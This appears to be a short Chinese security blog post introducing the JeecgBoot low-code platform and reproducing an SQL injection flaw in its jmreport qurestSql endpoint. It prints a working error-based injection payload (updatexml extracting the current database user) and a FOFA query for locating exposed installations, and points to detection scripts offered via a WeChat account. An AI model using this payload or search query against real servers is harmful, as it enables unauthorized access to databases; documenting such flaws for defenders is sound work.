本文介绍了JeecgBoot这款基于SpringBoot和相关技术的低代码平台,强调其功能特性如代码生成和业务加速。然而,文中也揭示了平台存在SQL注入漏洞,演示了如何利用漏洞复现和检测,提醒开发者注意Web安全问题。
JEECG-BOOT简介
JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!一系列低代码能力:Online表单、Online报表、Online图表、表单设计、流程设计、报表设计、大屏设计 等等...
漏洞描述
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
漏洞复现
url:
/jeecg-boot/jmreport/qurestSqlpostdata:
{"apiSelectId":"1290104038414721025","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}检测脚本
fofa语句:
title=="JeecgBoot 企业级低代码平台"
单个检测:
批量检测:
脚本获取方式:
关注本公众号"知攻善防实验室",回复"1004"获取
后台回复"交流群",获取技术交流群链接。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
